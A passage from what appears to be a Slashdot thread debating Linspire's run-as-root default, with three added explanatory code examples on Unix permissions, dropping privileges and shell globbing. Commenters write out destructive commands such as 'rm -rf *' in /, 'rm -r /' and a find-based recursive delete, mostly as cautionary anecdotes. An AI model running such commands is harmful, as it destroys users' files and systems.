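        self.modes = dict(modes)       # absolute path -> effective rwx bits for our user

    def _ancestors(self, path):
        parts = [p for p in path.split("/") if p]
        return ["/" + "/".join(parts[:i]) for i in range(len(parts))]   # "/" ... parent

    def can_traverse_to(self, path):
        """Name lookup walks every ancestor and each needs x. Losing x on /home
        is what makes `cd ~` fail even though ~ itself is untouched."""
        return all(self.modes.get(a, 0) & X for a in self._ancestors(path))

    def can_list(self, path):
        """readdir (ls, and the first step of rm -r) needs x on the way in and r on the directory."""
        return self.can_traverse_to(path) and bool(self.modes.get(path, 0) & R)

    def can_enter(self, path):
        """chdir needs x on the way in and x on the directory itself."""
        return self.can_traverse_to(path) and bool(self.modes.get(path, 0) & X)

    def rm_rf(self, path):
        """What `rm -rf path` would actually delete for our user. A directory
        whose names cannot be listed is never descended into, and unlinking
        an entry needs w and x on its parent."""
        removed = []

        def visit(p):
            kids = [c for c in self.modes if posixpath.dirname(c) == p and c != p]
            if kids and not self.can_list(p):
                return False                       # "cannot open directory: Permission denied"
            kids_gone = True
            for k in kids:
                kids_gone &= visit(k)              # rm keeps going, so no short-circuit
            parent_mode = self.modes.get(posixpath.dirname(p), 0)
            if p == "/" or not kids_gone or not (parent_mode & W and parent_mode & X):
                return False
            removed.append(p)
            return True

        visit(path)
        return removed

# Constructed tree as seen by user bob: /home belongs to root (r-x for bob), /home/bob is his.
TREE = {"/": 5, "/home": 5, "/home/bob": 7, "/home/bob/thesis.txt": 6}

def scenario(home_mode):
    """Run the three checks from the comments above with /home set to home_mode."""
    m = PermModel({**TREE, "/home": home_mode})
    return {
        "ls /home": m.can_list("/home"),
        "cd /home/bob": m.can_enter("/home/bob"),
        "rm -rf /home removes": m.rm_rf("/home"),
    }

if __name__ == "__main__":
    for label, mode in (("default r-x", 5), ("chmod a-x (r--)", 4), ("chmod a-r (--x)", 1)):
        print(label, scenario(mode))
```

With the default modes, `rm -rf /home` as bob wipes his own thesis but cannot remove /home/bob itself (its parent is not writable by him). With `a-x` on /home, `ls /home` still works but `cd /home/bob` and the recursive delete both stop at the lookup; with `a-r`, `cd` works but `rm -r` never gets a listing to recurse into, which is the correction above.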
Michael Robertson is the king of bad ideas that don't generate any revenue. Linspire has a zero chance of creating any reasonable revenue, just like Robertson's MP3.com. Robertson simply laughs all the way to the bank as his stocks are overvalued and he somehow convinces idiots to give him millions of dollars of seed money.
I've seen people do an rm -rf * in / when they THOUGHT they were chrooted in a safe directory. As it turned out, they had forgotten they were not.
I've also seen that happen with scripts that had a lot of sed and awk in them and that basically had a few bugs in their regular expression implementations that caused a lot more to be removed than was necessary.
I've also seen that happen with people who are too impatient when entering commands...they don't enter the entire wildcard expression and end up taking out whole chunks of the file system like /etc
- Any process that is owned by a given user has all the authority that that user could have
- Some executables allow a process to start other processes with root access. If there's an overflow in any of the numerous suid binaries, any process can use it to escalate.
- The most dangerous operations, such as processing network data, require root privileges. I still think that "must be root to bind ports < 1024" is the #1 Unix/Linux security bug and we've been suffering with it for three decades.
- There is a user (root) which can access everything in the system. There's no way to grant a program the capability to listen to port 80 without also granting it the capability to write raw blocks on the disk, access raw devices, access other users' files, etc. This is an absolute disaster. No ordinary web server needs the ability to write raw disk blocks, so it shouldn't have the capability to do it.
So yeah, the Unix/Linux security model is such a disaster that he's right! On a single-user machine (such as a typical Linspire machine) the user isn't really any worse off running everything as root. What would be nice is if someone would actually fix the Unix/Linux security model one of these decades.
I'm sure a lot of Unix old hands (perhaps complete with beards!) will dismiss what I'm saying as rubbish, but I also believe that just being an old Unixer doesn't give anyone any special understanding of security. The way to get a special understanding of security is to think about, and understand, some theory ideas like least-privilege, capabilities, compartmentalization, that kind of thing. All those are foreign to the traditional Unix world, which is based on users and permissions. The users-and-permissions model is the ROT-13 of security models.
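Added example, not from this page or any project: the ordinary answer to both the "bulkheads" comment earlier (a compromised user cannot fix up logs, sniff, or bind low ports) and the complaint just above that listening on port 80 drags in every other root power. The daemon does the single step that needs root, the bind, and then gives root up for good before it touches any network data. The user name "nobody" and the port are assumptions; as a normal user the low-port bind fails with EACCES, as root the demo binds 80 and drops. Linux capabilities (CAP_NET_BIND_SERVICE) are the finer-grained fix the comment asks for, but the bind-then-drop pattern predates them and works everywhere.

```python
"""Bind a privileged port, then drop root permanently (added example; user/port are assumptions)."""
import os
import pwd
import socket

def bind_listener(port, host="127.0.0.1"):
    """The privileged step. Ports below 1024 need root (or, on Linux,
    CAP_NET_BIND_SERVICE); port 0 asks the kernel for a free high port."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(16)
    return s

def drop_privileges(username):
    """Permanently become `username`. Returns True if a drop happened, False
    if we were not root. Order matters: supplementary groups, then gid, then
    uid; after setuid we could no longer change the other two."""
    if os.geteuid() != 0:
        return False
    pw = pwd.getpwnam(username)
    os.setgroups([])
    os.setgid(pw.pw_gid)
    os.setuid(pw.pw_uid)
    try:
        os.setuid(0)                     # must fail, or the drop was not real
    except PermissionError:
        return True
    raise RuntimeError("privilege drop was not permanent")

def start_service(port, run_as=None):
    """Bind first, drop second. Everything after this runs without the
    ability to rewrite logs, read other users' files or bind new low ports."""
    sock = bind_listener(port)
    dropped = drop_privileges(run_as) if run_as else False
    return sock, dropped

def serve_one(sock):
    """Tiny handler so the block runs end to end: echo one message back."""
    conn, _ = sock.accept()
    with conn:
        data = conn.recv(1024)
        conn.sendall(data)
    return data

if __name__ == "__main__":
    is_root = os.geteuid() == 0
    listener, dropped = start_service(80 if is_root else 0,
                                      run_as="nobody" if is_root else None)
    print("listening on", listener.getsockname(), "euid", os.geteuid(), "dropped root:", dropped)
    print("echoed", serve_one(listener))
```

The check after `setuid` is the part people skip: a drop that can be undone with another `setuid(0)` (saved-uid games, or a missing `setgroups`) leaves the daemon exactly as exposed as the comment above describes.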
I manage to use apt as a non-root user all the time, using sudo. Just like I do with every other package manager for every other unix OS I use. There is simply NO excuse to be running as root when sudo is so powerful and simple.
Hooray, I deleted the data in my home dir. Big deal, its backed up. It took a whole 8 minutes to restore. Somehow I think it would have taken me longer to reinstall my OS and all the applications I have installed. And if I hadn't been intentionally doing this just to see how long it takes to restore my data, I would have hit ctrl+c during the long period of "rm: blah: Permission denied" scrolling up the screen.
Actually, Robertson is right.
He said "why is it more secure to not run as root. Nobody really has a good answer. They say "oh, yeah, it is!", but it really isn't. Here's why: What's the most important thing on your desktop? It's the data. If someone gets access to your libraries or whatever, who cares? Your data is the most precious thing on your computer. And whether you log in as root or log in as user, you have access to that data, technically anyone who's compromising your account has access to your data as well. "
Obviously he is talking about single user computers, as most PCs are. If you have a single user computer, when your user account is penetrated, your root account is penetrated next time you su.
The last step in a Linspire install, which apparently no one in this thread has done, is to set up user accounts for a multi-user system. If it is a single user system, there is NO additional security to setting up a user account.
My data is the most important thing for me. I can reinstall Linux in 15 minutes, but my data is irreplaceable.
It must be a happy happy place in Linspire-land.
This reminds me of back in the day when everybody bragged on Linux uptime vs. Windows. The *NIX snobs still don't get the desktop after all this time. As long as a desktop stays up all day, that's all that matters because desktop users treat their PCs like TVs. Yes, 1990s Windows desktops often failed that test, but Linux users back then were comparing CLIs to desktops and bragging on uptimes.
This root flap is the same sort of deal. Yeah, root can kill all the users on a box. Guess what? Granny is the only user on the box. If user Granny's files are dead, the whole box is dead as far as she's concerned, and if her kernel has been replaced by KERNEL.i0wn3du, she is just going to run the restore CD.
That's not to say that I agree whole-heartedly with the "root is safe" assertion; but I understand where the guy is coming from. In a way the *NIXs are perhaps a victim of their own success in writing apps that are (usually) secure enough so that you can get away with running as root.
Yes, your data may be deleted when you launch a nasty virus under your account, but when your 12 year old son is scouring the Internet for pr0n, your data is safe.
There are more options for data recovery. Assuming a very annoying virus that just does 'rm -fR /', your links to the inodes are gone, not the data. Now if you were smart, you could just make an area available to the super user where all those inodes were hardlinked and could be restored. Of course there are ways around such things, like simply 'find | xargs tee', but at least there are other options available to secure files.
The OS can't be mangled. So even if you lose your data, at least you can still perform whatever functions you need to perform under a separate user. Or the kid from next door can come over, log on as the super user, rescue all your documents and mp3s, delete your user and home directory, add your user back, then move the data back....then you might not lose your data or your ability to use your computer.
Oh dear God now you've done it....
A better choice would have been binding a key on the local keyboard (a secure tty) to cause a root-privilege menu to come out over the current desktop (in such a way that no user-level window can obscure it).
Is it just me, or is one of his eyes blue and the other brown. Probably had a play in Photoshop. Creepy.
Those are for use by the press. E.g. there's something in a magazine about Linspire, so they pick up a press-quality picture and make a 2 cm x 1 cm box with the guy's face in the page.
Also, I'm convinced he has no clue. I will never go near "Linspire", ever. And I will not let anyone near me do the same.
What does ActiveX do that XPCOM and Java are incapable of performing?
:-)
I'll play devil's advocate here, and say the first thing that comes to mind: It can't run all those ActiveX applications that already exist. Companies invest money into programmers who will maintain or program existing software and infrastructure.
Maybe what's needed is an ActiveX type clone just to end this problem. Let's keep in mind that there are large numbers of IT workers who do not frequent this website regularly, and don't really care if XPCOM and Java are better - it still won't run the ActiveX applications they currently have.
There are large numbers of people who like having LESS work to do when they are at work. If they need to hunt down and replace all their internal ActiveX applications, that will simply make more work for them. Plus, their PHBs will always see this as just costing more money.
But, if this means swallowing some open source pride, and writing a GPL ActiveX clone just to edge out Microsoft elsewhere, then it's worth it. Of course it would never be installed by default, and of course there would be multiple pop-up windows telling you why this is a bad idea, but it should be available.
If the strategy is played correctly, we could start slowly moving companies over to more OSS solutions and away from ActiveX.
But, in the end, Compatibility is King, since your PHB sees this as a means of saving money in the short, and long-term. Anything that is seen as a non-drastic change to the infrastructure will always be regarded as a good thing as they view it as a means to save money. Think of all those computer "n00bs" who will still refuse to buy a Mac even though all their computer nerd friends tell them to buy one. (I have a PC - but I want my friends to start using Macs since I'm sick of fixing their PCs) But, I always hear the concern over compatibility, since they know not everything will work on a Mac. Yes, there are equivalent products, but they don't care since it won't run the "majority" of computer products already existing.
Am I completely wrong? Please tell me, I know someone here will anyway.
...for years (5 or more) without any problems and with Internet connection when the user is not an Admin-user...
Virus (which involves any user activity) may be avoided or/and removed easily and so can Spyware...
If you want that behaviour you require the 'interactive' option. rm -r will not prompt for every action, unless you're on a RedHat box with rm aliased to "rm -i".
That alias was the worst thing RedHat ever did. It didn't protect anyone, it just made the average joe too familiar with the force option. I haven't used RedHat since version 8.0, but the first thing I used to do was delete that bloody alias in my
I suspect most people find the force option a long time before they find the alias, but by that time using -f has become entrenched.
Has netcraft confirmed this yet?
You will see computers that are just as "usable" as everyone keeps wanting. You'll be able to do all your things without thinking about a filesystem or files or anything like that. It'll work great...
But it'll be so restrictive that it won't qualify as a general purpose computer in your eyes. It'll be good for companies, who can sell you ten computers instead of one, but that's it. Some will buy them. You will, if they become cheap, but you'll keep your gp machine.
The elevator crack is also silly because an elevator goes up, down, and stays still. The operation can be more or less complex, but that's all it does. A computer is a canvas for a painter, a darkroom for a photographer, a pasteboard for a desktop publisher, a video editor, a storage device capable of holding everything you have ever done or had the time to record or take a photo of, a typewriter for the novelist or a poet, a super fast and simple calculator for a child, a super fast and complex calculator for a scientist, a general purpose slave who has no complaints for a programmer, a spreadsheet for anyone running their own business or keeping track of their family finances, a limited tax attorney, a way of designing every physical thing from PVC pipes to rocket ships, and a robotic operator in charge of the construction of those things. It's a blazing testament to the will of man, a monument to tool use, and the best thing humanity has going for it since the opposable thumb.
And all of that was BEFORE the web!
It really is. Michael Robertson sees his Linspire Linux desktop as Linux for the masses. This is his number one priority over-riding all else. He probably knows, is probably well aware of every reason that it's inadvisable to run as root, and his technical staff are probably tearing their hair out now because they think he wasn't listening.
I think people here are misunderstanding his motives. Linspire is not a server distribution. It's not even marketed as a multi-user desktop distribution. Linspire is marketed as a single-user PC OS, with great multimedia capabilities. It's designed to appeal to the Windows users.
And if anything can break Microsoft's monopoly on the desktop it's what Linspire is trying to be; a freely distributable OS that matches and exceeds the functionality and user-friendliness of MS Windows.
Give the guy a break. It might not be our cup of tea, but so what? We don't have to use it. We have a choice, unlike the Windows users.
Bzzzzzt..."AAAAaaaaarrrgh!!!" Thud.
"XP has a super-root account which nobody but MS has access to"
:P) will accept the risks and run as root anyway. It's a conscious decision on my part, and I'm fully aware of the possible consequences. 'tis another reason why I'm muchos careful when running rm with -R...
So Microsoft left themselves a back door into *my* PC? This is exactly why the Blaster worm took off; because they left a back door entry into Remote Assistance.
Besides which, why the hell should they have a username on my machine? Why can't I utilise my PC to the utmost?
In any *NIX system root is GOD. There is very, very little that root can *not* do. Hence why it's very heavily recommended to use a seperate account for everday use, and just use su or sudo to install apps etc.
Some people (yes, me included. I hang my head in shame
Goten Xiao
He probably just doesn't have the code to run as a non-root user without requiring password. While his developers are working on it, he's blowing smoke and waving hands. "these are not the droids you are looking for" "who needs to run as non-root anyway". Meanwhile Windows is moving to a Least Privileged User model, and for a good reason. I bet Linspire will shortly as well.
When one RTFA they will notice that Robertson is talking about a desktop system. Having users log in as some root/admin account is not a big deal because the only thing valuable on that system is the data stored as the only user on their system. Obviously he's not saying "run apache as root". In fact he implies it would be a very bad idea to allow things like a webserver to have write-access to a user's data!
Now if you are maintaining a multi-user system, root access is more powerful because it grants you full access to all users' information. Although these days a family computer has multiple accounts on it, Little Timmy and Mom's data is separate. If Timmy downloads some malicious code in some new music sharing program that turns out to be a trojan, at least Mom's calendar, address book and tax information will be protected.
Of course I'd recommend periodic backups to give you real data security. That's perhaps more important than the root/non-root issue.
“Common sense is not so common.” — Voltaire
Not kind.
You should have used test and test2 as a subdirectory
your script will delete *.tar in the current directory.
Well I don't have any anyway : only .tar.gz and .tar.bz2
only slightly different than rm -rf *
and way worse if you are running as root.
You do realize the user isn't actually running apt themselves right? The graphical application that they use currently does "install command", it just needs changed to do "sudo install command". Users will never see or notice the difference, the lindows knobs just have to do their job instead of the current cop-out of making linux into a single user system.
People, move along now, this is a jest from Robertson to get our attention and start up a yes-no debate.. fugeddabatit...
-if at first you don't succeed, stay the heck away from paragliding.
Obviously his answer is Market Force driven and non-technical. He ships as root, he doesn't want to sacrifice his product's perception. He'll never say anything else.
Would you expect the CEO of Exxon to openly state that there is something called Global Warming and it is necessary for everyone to stop driving gasoline powered cars?
Certainly not until they have the answer. It may be that Linspire is working on changing this for real, but it won't be openly discussed.
hey kids, can you say:
FLAMEBAIT!
I know the hardcore geeks feel differently, that's fine.
The /. crowd seems to assume that everything is a server. Even if it's their home computer, it's got to run Apache, MySQL, Squid, a mail server, etc.
That is _not_ what Joe Average needs, however. For that matter, not what _I_ need.
I explicitly do _not_ want a web server, database server, or any other goddamn server on my desktop machine. I explicitly don't need one, and I explicitly don't want one using up my RAM and CPU cycles. I'm pretty sure mom and dad don't either.
So the whole "but what if someone uses a vulnerability in Apache?" is a moot point: they won't find Apache on my machine to start with.
Also the whole idea why it's called a _Personal_ Computer (PC) is that I don't need, nor want, a multi-user bonanza on it. It's not some server where every Tom, Dick and Harry has their own separate account and their own separate data.
The same, incidentally, applies to most family computers. Joe and Jill Average, and their 2.2 children, most of the time don't keep their files secret from each other. It's not like Jill's digital photos of trees and squirrels are some top secret.
So all that someone could exploit is some program _I_ am currently running, as _my_ user. Period. And then it can erase my data.
And that assessment is right: that's what's important on that system. The programs are the easy part: reinstalling the whole system and all the programs is a few hours exercise. Getting your own data back might not even be possible, short of having a time machine.
I.e., for Joe and Jill Average, with a _desktop_ machine (not a server), it really makes zero difference whether they run as root or as some other user.
A polar bear is a cartesian bear after a coordinate transform.
Bob runs his system as root, and Susie doesn't. Bob downloads something from the internet which (*gasp*) has a virus attached to it which *can* affect a Linux system. Bob infects his whole system. Susie, who downloads the same file, infects her user account. Running as a user reminds you that you are not in control of the system, and to be in control you have to enter a password. This usually makes people more wary about what they do and do not do as root.
Make sense?
"It's here, but no one wants it." - The Sugar Speaker
"bash$ rm -r /"
'nuff said
The average user who wants to change the computer setup for some xyz piece of hardware doesn't want to bother with passwords. Hell, what is the point of passwords anyway? Most passwords are easily cracked or sniffed. Dialogs / apps that need super user access to perform tasks and keep asking for higher privileges constantly just condition the user to enter the passwords automatically. If a popup in a browser asks the user for the root password I wouldn't mind betting that most uneducated users would quite happily enter it.
rm -rf *
DOHHHH!
While I do agree that the most important data is what is stored in the $HOME directory, running everything as root, puts the OTHER users at risk and not just yourself.
Some would say that this doesn't matter if you are a home user but even home users should (and often do) have different users for the different family members.
If the 13 year old kid downloads lots of 31337 warez and gets a worm thrown in with it, this shouldn't affect dad's documents, budget, tax stuff and credit card information.
If you run each account as root, this is bound to happen sooner or later.
The Right Thing [tm] to do is to make it easier for home users to live with security, rather than just remove security. OS X manages this decently, why can't Linspire?
A plugin that would let Gecko-based browsers use quite possibly the most fundamentally-flawed piece of software ever to have been written?
Gee, who'da thunk it?
Endemic. I do not think it means what you think it means.
"The Milliard Gargantubrain? A mere abacus - mention it not."
None of that stuff applies to a Lindows box. This isn't the mainframe days anymore, Lindows is not a mainframe.
The "the point of why we do things a certain way" is that in the old days when things were different (eg 2 computers on the whole school campus) it used to make sense.
"as root you can still get in and fix it, completely" - yeah, I'd like to see a Lindows user try and do that.
Try put the CD in the drive, click reinstall.
The only reason you thought up that's potentially arguable is not being able to run services below port 1000, specifically port 25, but does that really matter when the box can still connect to port 25, and accept incoming connections on higher ports? It can still be a zombie on user privileges.
At the risk of getting modded as Redundant, I'll say it... Certain things can't be done as regular users and need root privileges. Lindows (or Linspire or whatever) wants to dumb down things and so wants to avoid asking password prompts and such. Therefore Lindows either already logs in the main regular user as root or it wants to do it in the future (I don't know, I've never used it). Of course, pretty much every Linux newbie site and every Linux user says that doing normal things as root is bad and stupid. This makes Lindows look bad in the eye of its users and in the eyes of experienced people and the media. Therefore it wants to start spreading shit that root is safe and people who disagree are paranoid and idiots.
(Although I don't like getting modded down, I do hope this post is redundant and everyone did know this point)
Everyone here knows his was a stupid quote, but from a marketing standpoint, it's valid... None of us are going to buy Linspire -- we'll run our slack/deb/rh/fedora -- but, cheap newbies will, and to them, it's no different than running their existing OS, Windows 98...
There's no chance Robertson actually means what he's saying though. The CEO of a linux company can't possibly be that stupid.
Just for the sake of repeating myself, don't assume that every computer in the world is a server, and/or that everyone must be running a l33t multi-user system with 500 different accounts defined.
A normal user's home computer is a very different beast. Normal users don't measure their e-penis in number of uptime hours or number of l33t server processes on their system. Most of that l33t stuff that your average /. nerd is proud of, is just a waste of any normal user's time.
The average normal user doesn't have a server or thousands of user accounts on his/her server. And has no intention of going that route. Now in that context:
"Running as root is like pointing a loaded gun at everyone just in case they're a criminal."
Yes, except there is no one else on that computer. So it's more like pointing around a gun in your own concrete basement, with no one else around. Whop-de-do, that must be sooo good a reason to not run as root. Not.
"Running as root is like driving down the highway with your hood open and your oil cap off."
Except it's on your own private strip of road, and no one else has any business to be on that road to start with. So the problem is?
" Running as root is like posting to slashdot without reading TFA.
Except it's a post in your own private diary. So the problem is?
Of course you can't INSTALL it without Admin, that's the whole point of Admin! You can still USE Firefox on a user account.
Freedom: "I won't!"
He's full of shit. Even Mac OS X, the quintessentially "easy to use, just works" OS, requires you to type in the administrator (similar but not the same as root) password before installing new software or OS updates. Granted, they do give "administrative users" access to the /Applications directory, so the default non-root user can copy apps to /Applications in those cases where drag-and-drop is all you need, rather than an install wizard.
The idea that everyone should "just run as root" is asinine and toxic. People like this, and the distributions they create implementing this philosophy, will give Linux a bad name security wise, and probably become the Microsoft poster child for how Linux doesn't measure up to its "hype." He'll give the disinformationists in Redmond something to hang their deceptive hats on, and damage the reputation of hundreds of distributions that are more secure than windows ever will be because they don't succumb to the least common denominator.
The Future of Human Evolution: Autonomy
Compuserve did not "hold the patent", Sperry (by then Unisys) did. Compuserve merely licensed the patent. See, for example, amongst many other web resources, http://www.kyz.uklinux.net/giflzw.php and http://lpf.ai.mit.edu/Patents/Gif/Gif.html Just being pedantic, but the idea of Compuserve ever coming up with something patentable was mind-boggling...
There is a huge difference between mission critical software and end user systems.
I have never, and will never I'm quite sure, see any deaths related to some end users Dell system kill them because Outlook Express crashed on them.
Once again, you're comparing apples and oranges.
Really, I know what I'm doing...Ohhhh, look at the shiny buttons!
Michael Robertson's market is rather different from the typical Linux market. He's trying to sell an end user commodity.
The end user does not give a fuckola about permissions, user management, and the meaning of the word "root". Insecure? Yeah, a little.
If a regular user runs a malicious program, they've already risked all of their own data. The system itself is "safe", but many of the reasons people 0wn Windows boxes can be satisfied just by having user privileges. It can be used as a spam conduit. It can be used in a DDoS attack. It can give the keys to someone else so they can try a local exploit to gain root, or it may have a set of local exploits built in to elevate to root right there.
Running any malicious code represents some kind of compromise. The argument for running it as a non-privileged user vs. root user is just one about dampening the impact, but just slightly.
On the other hand, running everything as root makes the end user experience a lot more comfortable. Security is inconvenient.
He's such a lame fucker. He doesn't know a shit of security. Even a kid nowadays has an answer for why running as root is unsafe. damn bitch
You have to make choices in life. Your company chose to go the Microsoft route, and now they are a little stuck. There are many reasons that OpenOffice etc. don't support these MS solutions. Yes a few of them are a little pathetic (eg. "I aint supporting no MS shit!"). But this is just how it is.
So you choose the MS way, the Open Source way, or perhaps a company that has a solution and doesn't believe in lock-in.
Once you've chosen you have to eat what you've picked; there's no point whinging about it afterwards.
No, it's exactly as secure as I think - and I even said that it wasn't a perfect implementation in my post - I just think it's a brilliant model.
The "right" answer to your complaint is to make the default admin account that is admin but isn't wheel - it'll just make you sudo more things. I agree with you about this detail, but it's an implementation detail, not a flaw in the model.
Also, of course, the OSX firewall is a packet filter (pf, I believe) and a GUI. The GUI might not set the filter to block UDP but the underlying filter definitely does. So you definitely could fix this without installing any software. Still an Apple failure? Definitely. Better than the Windows equivalent structure? Also definitely.
Looking for freelance Actionscript (Flash/Flex) or ColdFusion work and/or freelance developers. Email me, put Slashdot
don't assume that every computer in the world is a server, and/or that everyone must be running a l33t multi-user system with 500 different accounts defined
Nice straw man. You shouldn't assume that most computers are only used by one person.
Most people live in a household with *MORE THAN ONE PERSON*, and when these people have a computer, it will *MORE OFTEN THAN NOT* be shared with the other members of the household.
You don't need 500+ people on a system for it to be multi-user. You only need *TWO*. That's it - just two people.
Ask someone "hey, you won't mind if your brother accidentally deletes all your files, right?" And you'll get a "of course I mind."
The argument that data is more important than the system isn't relevant to most computers - it only matters if you can guarantee that *NOBODY* else will be using your computer.
Now, in *YOUR* case, that may be true, but don't assume that because it's true in your case, that it's true in everybody's case.
The stupidity of this position is very easy to explain. He's claiming that the worst thing (losing user data) is the only thing to worry about. Since non-root doesn't prevent that, let's get rid of it.
To use his own analogy, if the worst thing that can happen in a car is to run into a wall, then why have door locks? Whether you have locks on the door or not, you're still going to die. And they make it hard to get into the car, so let's get rid of them.
What is this fixation with this command? I can think of a much more widespread example of why running as root is not secure: Anything you launch runs with root privileges. That means a fast-track route for anything even slightly malicious (worms, trojans, spyware) to your kernel. Please don't tell me they don't exist; if this running as root becomes widespread, think of the 1337-ness factor of being the VX-er who trashed a few thousand Linux boxen.
If you think about the "root" username in terms of Australian slang, you'll get the idea: You *can* root your system using it in many ways that aren't immediately apparent. Try, for example, chmoding /var/log 400. Try chowning someone's home directory. Try deleting the kernel from /boot. Try changing root's shell and then deleting the shell binary (or one of its dependencies if it's dynamically linked) and dropping to single-user mode.
It looks to me like a case of SELECT FROM Linspire_employees WHERE CLUE > 0
No records found.
No offence to anyone working for Linspire, but if you don't tell your boss he's a jerk and needs a good dose of clue stick #10, you're as clueless as he is.
Between this little statement and Linus having a go at Tridge, I'm becoming more and more pleased with my own choice of open source OS. Please tell me these guys are going to stop before they destroy any good that they have done. If it wasn't for Linux, we'd have hardly any applications to run.
Resistance is futile. Reactance buggers it up.
Notice what he says: "Nobody really has a good answer." That should be your first clue that someone is falling down on the job and not giving the boss the right advice. Or maybe someone is afraid to tell the boss something he might not want to hear.
The comment "I defy anybody to tell me why is it more secure to not run as root." is another way of telling me to send him my resume. It's also a opportunity for a smart consultant out there to land themselves a nice contract.
And "I would imagine a few Slashdotters would dispute that." tells me he is smart enough to get the user community talking about this problem and seeing what solutions come out of the woodwork. Once he hears a good idea, it's time to get "his people working on that" and come out with a new product without paying royalties for the idea. Just another way to do low-cost research. Not the first time it's been done.
Just my 3.14 cents worth.
...it's evil. :D
:D
A looooong time ago in a galaxy far, far away when I was in college, there was a graduate student (Bill Crossman, if I recall, was his name) who one day decided to clear out his home directory before packing up to go home for the summer. So he typed "rm *" at the shell command line and thought all was good.
He forgot he had logged in as root.
From that point on he was known as "arr emm star Crossman"
Learning it is the happiest you can be in linux when not surfing for porn.
find /. -type f -name *.tar -exec rm {} \;
Never confuse volume with power.
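What the shell does with the unquoted *.tar in that find command, as an added example that is not part of the thread: the temporary tree and its file names are constructed, the searches only print (no -exec rm), and the only thing removed is the temporary directory itself at the end.

```shell
#!/bin/sh
# Added example, not from the thread: what the shell does with the unquoted *.tar
# in "find /. -type f -name *.tar -exec rm {} \;". The shell expands *.tar against
# the current directory BEFORE find starts, so find never sees the pattern. All paths
# below belong to a constructed temporary tree, and the searches only print matches.

# Build the constructed tree: five .tar files spread over three subdirectories.
make_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/top" "$t/deep/er" "$t/many"
    : > "$t/top/here.tar"
    : > "$t/deep/one.tar"
    : > "$t/deep/er/two.tar"
    : > "$t/deep/not-a-tar.txt"
    : > "$t/many/a.tar"
    : > "$t/many/b.tar"
    printf '%s\n' "$t"
}

# Run the search from inside "$1/$2" with the pattern unquoted, exactly as posted.
# Prints how many files find reports, or "error" when find rejects its arguments.
unquoted_count() {
    ( cd "$1/$2" || exit 1
      # No .tar in the cwd: the glob stays literal and find happens to do the right thing.
      # One .tar in the cwd: the glob becomes that file name, so find hunts for files
      #   with that exact name under "$1" (the "deletes *.tar in the current directory"
      #   that the reply above warns about, once -exec rm is back in place).
      # Two or more: find receives extra words after -name and aborts with a usage error.
      if ! find "$1" -type f -name *.tar >/dev/null 2>&1; then
          echo error
          exit 0
      fi
      find "$1" -type f -name *.tar 2>/dev/null | wc -l | tr -d ' ' )
}

# The same search with the pattern quoted: find does the matching itself, whatever the cwd.
quoted_count() {
    ( cd "$1/$2" || exit 1
      find "$1" -type f -name '*.tar' | wc -l | tr -d ' ' )
}

# Stand-alone demonstration; the constructed tree is removed afterwards.
T=$(make_tree)
printf 'unquoted, cwd has no .tar  (pattern stays literal):     %s\n' "$(unquoted_count "$T" "")"
printf 'unquoted, cwd has one .tar (pattern becomes here.tar):  %s\n' "$(unquoted_count "$T" top)"
printf 'unquoted, cwd has two .tar (find gets two words):       %s\n' "$(unquoted_count "$T" many)"
printf 'quoted,   cwd has two .tar (find matches the pattern):  %s\n' "$(quoted_count "$T" many)"
rm -rf -- "$T"
```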
The problem with this statement is that the man's idea of security is too simplistic. He sees the only security threat worth worrying about as stealing, altering, or erasing the user's data. Certainly this is a valid concern, and if it truly were the only thing to worry about on the Net then his complaint would be valid. Where it falls on its face, however, is the plain and simple fact that this is not the only thing to be concerned about, security-wise.
Nowadays, many malware authors don't actually care much about any data that's stored on disk. It's the data you enter every day, often without realizing it, that's *really* interesting. What sites you visit, what ads you respond to, and such: these can be gleaned from history files with some success, but by the time you get that data it's already out of date. Getting it in realtime is better, and this is what spyware does.
Even this, however, is not the only reason malware exists. Very often, what malware authors want isn't even your data; they want your computer itself. That's what zombie networks are, essentially. This allows The Bad Guys (be they crackers, spammers, or whatever) to make use of your machine to perform their nefarious activities, and the hell of it is that they can do it in ways that make it look like you're the culprit.
Of course, even this doesn't cover everything. Adware doesn't usually bother to collect data (though it can), and often doesn't act as a zombie: it's just there to shove even more ads in your face. Yes, this is more annoying than destructive, but it's still malicious.
The point of all this: Data may be king, but a king is nothing without his court. That's the problem with this man: he's too ignorant to see any security problems outside of data theft. As a result, he advocates irresponsible computing, seeing no harm not because there isn't any harm -for there is- but because his concept of harm is not broad enough.
With cars, there's a clear middle ground. I don't know shit about fixing the damn thing, but I know when to get the oil changed and I know to take it to the shop when a light comes on.
With computers, you have people who think any idiot should be able to use it without "oil changes" (security updates), and gear-heads who think you should be able to build a computer from scratch before you're allowed to use it. Both are wrong.
Yes, it is very difficult to configure, but the system policy and other aspects of NT security provide extremely fine-grained control over what users, applications, machines, etc may or may not do.
.NET allows applications to demand, request, or refuse permissions, so if the developer chooses to, the program will say upon startup "I am an E-Mail program and want to access nothing but my data folder." Then, (provided there are no holes in .NET) if there is a security hole in the app that would allow an attacker to, say, connect to IRC, the .NET security model will refuse this connection.
Now if only it were pre-configured out of the box. But of course the minute Microsoft were to announce that any third-party application must be validated by MS to determine its default security rights, everyone would complain that MS gets to decide which programs make it to market.
Also,
They want the big bucks for their "professional" OS, they accept the responsibility for making it work.
If I want to "take steps to fix it", I'll run Gimp on Linux where it just works, and I can fix it (or pay someone to) when it doesn't.
Forget diamonds, copyright is forever.
Installing software more often than not alters the Windows OS configuration by way of registry writes (and changes to Program Files). Requiring Administrator rights for that is perfectly reasonable and often preferable. However, once installed, software like Firefox should not require Administrative rights to run.
So, to recap, software installers make fundamental OS configuration changes and thus are fine when restricted to Admin users. The software that they install, however, should be accessible by anyone unless specifically denied by the system Admin, unless the software is specifically designed to alter hardware or OS config.
STOP MISUSING APOSTROPHES, YOU MORONS!!!
I would like to bring attention to this man. Michael Robertson was the founder of MP3.com, and consequently is the man who single-handedly drove it into the ground and sold out to Universal. This guy is a joke, plain and simple. A stubborn fool who is desperate to sell another big success like MP3.com was in its prime.
Leave him and his Linspire alone. He doesn't "get it", he's just good at telling outrageous stories in an attempt to gain mindshare.
-Billco, Fnarg.com
The thread covers most of the reasons why working as root is just bad and dangerous. The two most important for me are typos on /bin/rm calls and unaudited software.
So far I didn't know what to think of Robertson. Now I am confident he's an idiot.
echo mailto: !#^."<*>"|tr "<*> mailto:" net@madduck
